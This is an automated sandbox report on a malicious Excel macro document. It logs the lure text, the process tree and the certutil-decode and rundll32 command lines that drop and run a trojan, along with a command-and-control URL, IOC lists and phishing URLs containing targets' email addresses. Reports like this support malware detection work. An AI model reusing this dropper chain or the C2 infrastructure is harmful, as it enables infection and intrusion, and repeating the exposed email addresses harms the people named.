Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://www.verizonmedia.com/advertising
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://www.verizonmedia.com/careers
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html&quot;
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/index.html
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://www.verizonmedia.com/policies/us/en/verizonmedia/terms/otos/index.html
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://www.yahoo.com/
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://yahoo.uservoice.com/forums/341361-yahoo-home?browser=ie&amp;bucket=FPTRELUG105&amp;os=window
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownHTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 87.248.100.215:443 -> 192.168.2.3:49709 version: TLS 1.2

System Summary:

Malicious sample detected (through community Yara rule)
Source: C:\Users\Public\94101.png2, type: DROPPED | Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8 | Screenshot OCR: Enable editing" from the yellow bar 13 above. 14 15_ Once you have enabled editing, please click
Source: Screenshot number: 8 | Screenshot OCR: Enable content' ontheyellow barabo:: 20" , a *this document is completely safety to open 21 22 2
Found Excel 4.0 Macro with suspicious formulas
Source: Presentation_812525.xlsb | Initial sample: CALL
Source: C:\Users\Public\94101.png2, type: DROPPED | Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: classification engine | Classification label: mal96.expl.evad.winXLSB@11/14@2/4
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3984:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{60490B27-0950-42C5-96BE-3819E3A7C960} - OProcSessId.dat
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\certutil.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decodehex C:\Users\Public\94101.png2 C:\Users\Public\94101.png
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\ProgramData\ioq\ioq.dll,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decodehex C:\Users\Public\94101.png2 C:\Users\Public\94101.png
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\ProgramData\ioq\ioq.dll,DllRegisterServer
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: Presentation_812525.xlsb | Initial sample: OLE zip file path = xl/media/image1.png
Source: Presentation_812525.xlsb | Initial sample: OLE zip file path = docProps/thumbnail.wmf
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_10001C26 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_009032D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_00903270 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_009007B8 push eax; ret
Source: C:\Windows\SysWOW64\certutil.exe | File created: C:\Users\Public\94101.png

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\certutil.exe | File created: C:\Users\Public\94101.png

Hooking and other Techniques for Hiding and Protection:

barindex
Uses certutil -decodeShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2
Source: unknownProcess created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decodehex C:\Users\Public\94101.png2 C:\Users\Public\94101.png
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decodehex C:\Users\Public\94101.png2 C:\Users\Public\94101.png
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: rundll32.exe, 00000007.00000002.255071756.0000000000900000.00000002.00000001.sdmp; Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000007.00000002.255071756.0000000000900000.00000002.00000001.sdmp; Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000007.00000002.255071756.0000000000900000.00000002.00000001.sdmp; Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000007.00000002.255071756.0000000000900000.00000002.00000001.sdmp; Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_10001A64 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_10001E5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exe; Memory protected: page execute read | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 74.6.143.26 187
Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 172.104.129.156 80
Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 87.248.100.215 187
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_10001C6B cpuid
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_1000168B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Mitre Att&ck Matrix

Techniques listed per tactic column; the bracketed digits are the report's signature-hit markers, reproduced as printed.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Scripting [1]; Exploitation for Client Execution [13]; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: Process Injection [11]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: Masquerading [121]; Disable or Modify Tools [11]; Process Injection [11]; Deobfuscate/Decode Files or Information [1]; Scripting [1]; Obfuscated Files or Information [1]; Rundll32 [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: System Time Discovery [1]; Security Software Discovery [111]; Remote System Discovery [1]; File and Directory Discovery [1]; System Information Discovery [13]; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: Encrypted Channel [2]; Ingress Tool Transfer [2]; Non-Application Layer Protocol [2]; Application Layer Protocol [13]; Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

Behavior Graph


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 342076
Sample: Presentation_812525.xlsb
Start date: 20/01/2021
Architecture: WINDOWS
Score: 96

Signatures on the sample:
  • Malicious sample detected (through community Yara rule)
  • Multi AV Scanner detection for dropped file
  • Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
  • 4 other signatures

Process tree (as drawn in the graph):
  EXCEL.EXE (started; 28 38)
    DNS/IP: 192.168.2.1 unknown unknown
    Dropped: C:\Users\user\...\~$Presentation_812525.xlsb, data
    Dropped: C:\Users\Public\94101.txt, ASCII
    Signatures: Uses certutil -decode; Document exploit detected (process start blacklist hit)
    certutil.exe (started; 2)
      Dropped: C:\Users\Public\94101.png2, ASCII
      Signature: Drops PE files to the user root directory
      conhost.exe (started)
    rundll32.exe (started; 16)
      DNS/IP: 172.104.129.156, 49707, 80 LINODE-APLinodeLLCUS United States
      DNS/IP: new-fp-shed.wg1.b.yahoo.com 87.248.100.215, 443, 49709 YAHOO-IRDGB United Kingdom
      DNS/IP: 2 other IPs or domains
      Signature: System process connects to network (likely due to code injection or exploit)
      rundll32.exe (started)
    certutil.exe (started; 2)
      Dropped: C:\Users\Public\94101.png, PE32
      conhost.exe (started)

Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source | Detection | Scanner | Label
C:\Users\Public\94101.png | 36% | ReversingLabs | Win32.Trojan.Woreflint

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
https://cdn.entity. | 0% | URL Reputation | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
https://www.ad.com/?utm_source=yahoo-home&amp;utm_medium=referral&amp;utm_campaign=ad-feedback&quot; | 0% | Avira URL Cloud | safe
https://api.aadrm.com/ | 0% | URL Reputation | safe
http://172.104.129.156/campo/o/o | 0% | Virustotal |
http://172.104.129.156/campo/o/o | 0% | Avira URL Cloud | safe
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
https://officeci.azurewebsites.net/api/ | 0% | Virustotal |
https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
https://wus2-000.pagecontentsync. | 0% | URL Reputation | safe
https://www.odwebp.svc.ms | 0% | URL Reputation | safe
https://www.verizonmedia.com/careers | 0% | Virustotal |
https://www.verizonmedia.com/careers | 0% | Avira URL Cloud | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe
https://www.verizonmedia.com/policies/us/en/verizonmedia/terms/otos/index.html | 0% | Avira URL Cloud | safe
https://api.cortana.ai | 0% | URL Reputation | safe
https://staging.cortana.ai | 0% | URL Reputation | safe
https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html | 0% | Avira URL Cloud | safe
https://cortana.ai/api | 0% | URL Reputation | safe
https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html&quot; | 0% | Avira URL Cloud | safe
https://wus2-000.contentsync. | 0% | URL Reputation | safe
https://powerlift.acompli.net | 0% | URL Reputation | safe
https://cortana.ai | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
new-fp-shed.wg1.b.yahoo.com | 87.248.100.215 | true | false | | high
yahoo.com | 74.6.143.26 | true | false | | high
www.yahoo.com | unknown | unknown | false | | high

        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://172.104.129.156/campo/o/o | true | 0% (Virustotal); safe (Avira URL Cloud) | unknown

        URLs from Memory and Binaries

                                                                                                                        https://s.yimg.com/uu/api/res/1.2/UFLqS.xvyj1podCMDQzrLA--~B/Zmk9c3RyaW07aD0xOTg7cT04MDt3PTM4MDthcHBrundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drfalse
                                                                                                                          high
                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                                                                                            high
                                                                                                                            https://skyapi.live.net/Activity/14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://www.verizonmedia.com/policies/us/en/verizonmedia/terms/otos/index.htmlrundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://api.cortana.ai14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://visio.uservoice.com/forums/368202-visio-on-devices14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                                                                                              high
                                                                                                                              https://staging.cortana.ai14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://onedrive.live.com/embed?14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                                                                                                high
                                                                                                                                https://augloop.office.com14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://s.yimg.com/aaq/wf/wf-account-switch-1.1.2.jsrundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drfalse
                                                                                                                                      high
                                                                                                                                      https://api.diagnostics.office.com14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://store.office.de/addinstemplate14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://api.powerbi.com/v1.0/myorg/datasets14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://s.yimg.com/aaq/vzm/cs_1.1.3.jsrundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drfalse
                                                                                                                                              high
                                                                                                                                              https://s.yimg.com/os/yc/css/bundle.c60a6d54.css9J0CLPJO.htm.6.drfalse
                                                                                                                                                high
                                                                                                                                                https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html9J0CLPJO.htm.6.drfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://cortana.ai/api14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://s.yimg.com/cv/apiv2/default/icons/favicon_y19_32x32_custom.svg9J0CLPJO.htm.6.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://s.yimg.com/aaq/wf/wf-rapid-1.5.0.jsrundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://s.yimg.com/rz/l/favicon.ico9J0CLPJO.htm.6.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://api.diagnosticssdf.office.com14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://login.microsoftonline.com/14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html&quot;9J0CLPJO.htm.6.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://api.addins.omex.office.net/appinfo/query14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://wus2-000.contentsync.14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://clients.config.office.net/user/v1.0/tenantassociationkey14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=.e0macUGIS.Fz63sr2P207YOEOlgDwoy2SQq4Qs8SQ3DYflErundll32.exe, 00000006.00000002.250797242.0000000004B00000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://powerlift.acompli.net14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://s.yimg.com/rq/darla/4-6-0/js/g-r-min.js9J0CLPJO.htm.6.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://cortana.ai14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown

                                                                                                                                                                    Contacted IPs


                                                                                                                                                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
74.6.143.26 | unknown | United States | 26101 | YAHOO-3US | false
172.104.129.156 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | true
87.248.100.215 | unknown | United Kingdom | 34010 | YAHOO-IRDGB | false

                                                                                                                                                                    Private

                                                                                                                                                                    IP
                                                                                                                                                                    192.168.2.1

                                                                                                                                                                    General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 342076
Start date: 20.01.2021
Start time: 14:01:58
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 40s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Presentation_812525.xlsb
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 31
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal96.expl.evad.winXLSB@11/14@2/4
                                                                                                                                                                    EGA Information:
                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                    HDC Information:
                                                                                                                                                                    • Successful, ratio: 25.7% (good quality ratio 23.5%)
                                                                                                                                                                    • Quality average: 79.5%
                                                                                                                                                                    • Quality standard deviation: 31.7%
                                                                                                                                                                    HCA Information:
                                                                                                                                                                    • Successful, ratio: 58%
                                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                    • Adjust boot time
                                                                                                                                                                    • Enable AMSI
                                                                                                                                                                    • Found application associated with file extension: .xlsb
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 104.42.151.234, 52.255.188.83, 52.109.32.63, 52.109.76.35, 52.109.8.22, 51.11.168.160, 23.210.248.85, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 104.43.193.48, 20.54.26.129, 51.132.208.181
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match, followed by the associated sample names / URLs seen with it in earlier analyses (detection verdict in parentheses):

74.6.143.26
• Document_7647.xlsb (malicious)
• Document_7647.xlsb (malicious)
• Invoice_52133.xls (malicious)

87.248.100.215
• Statement_1472621419.xls (malicious)
• Statement_1472621419.xls (malicious)
• document.xlsb (malicious)
• document.xlsb (malicious)
• Document_8297.xlsb (malicious)
• Document_8297.xlsb (malicious)
• Document_7647.xlsb (malicious)
• Document_7647.xlsb (malicious)
• Document_7647.xlsb (malicious)
• download.exe (malicious)
• YowyaN7HQq.exe (malicious)
• Document_32251.doc (malicious)
• Information_1598546901.doc (malicious)
• https://firebasestorage.googleapis.com/v0/b/mdhghfbfggdndgfdvnd.appspot.com/o/index1.html?alt=media&token=d97d4868-2770-48a4-b497-20b5cf4d5cc9&email=judy.fabre@nrgenergy.com&domain=judy.fabre@nrgenergy.com (malicious)
• https://firebasestorage.googleapis.com/v0/b/nndddfmffkfkgkgkgkg.appspot.com/o/index1.html?alt=media&token=0c68e3bb-ffcf-4ae0-8bbb-4655ef7d76f0&email=tbailey@himss.org&domain=fakename@himss.org (malicious)
• remote210949482.doc (malicious)

Domains

Match, followed by the associated sample names / URLs (detection verdict; context IP):

new-fp-shed.wg1.b.yahoo.com
• Statement_1472621419.xls (malicious; 87.248.100.215)
• Statement_1472621419.xls (malicious; 87.248.100.214)
• Statement_1472621419.xls (malicious; 87.248.100.215)
• document.xlsb (malicious; 87.248.100.215)
• document.xlsb (malicious; 87.248.100.216)
• document.xlsb (malicious; 87.248.100.215)
• Document_8297.xlsb (malicious; 87.248.100.215)
• Document_8297.xlsb (malicious; 87.248.100.215)
• Document_8297.xlsb (malicious; 87.248.100.216)
• Document_7647.xlsb (malicious; 87.248.100.215)
• Document_7647.xlsb (malicious; 87.248.100.215)
• Document_7647.xlsb (malicious; 87.248.100.215)
• https://survey.alchemer.com/s3/6089047/Contract-Addendum (malicious; 87.248.100.216)
• Invoice_52133.xls (malicious; 87.248.100.216)
• Invoice_52133.xls (malicious; 87.248.100.216)
• Invoice_52133.xls (malicious; 87.248.100.216)
• download.exe (malicious; 87.248.100.215)
• wDFwq4e9Jo.exe (malicious; 87.248.100.215)
• YowyaN7HQq.exe (malicious; 87.248.100.215)
• KQxVPPX4zx.doc (malicious; 87.248.100.216)

ASN

Match, followed by the associated sample names / URLs (detection verdict; context IP):

LINODE-AP (Linode LLC, US)
• Statement of Account as of 01_20_2021.xlsm (malicious; 69.164.207.140)
• sample20210120-01.xlsm (malicious; 69.164.207.140)
• by9zwa7p1zip.dll (malicious; 69.164.207.140)
• WvOPvAh5Rl.exe (malicious; 45.33.23.183)
• Pre-order.xlsx (malicious; 172.104.26.201)
• NEW AGREEMRNT 18-01-2021.xlsx (malicious; 172.104.235.192)
• NEW COMPLIANCE 18.01.2021.xlsx (malicious; 172.104.235.192)
• Company profile.exe (malicious; 66.228.39.174)
• Purchase Order_pdf.exe (malicious; 139.162.30.170)
• Company Profile.exe (malicious; 139.162.75.17)
• document_84237-299265042.doc (malicious; 173.255.195.246)
• ARCH-012021-21-1934.doc (malicious; 173.255.195.246)
• mal.exe (malicious; 45.33.120.62)
• Bestand.doc (malicious; 173.255.195.246)
• 6SRdYNN63E.exe (malicious; 176.58.123.25)
• https://doc.clickup.com/p/h/2hm67-99/806f7673f7694a9 (malicious; 45.79.77.20)
• https://farmetal.org/ofc3 (malicious; 45.79.77.20)
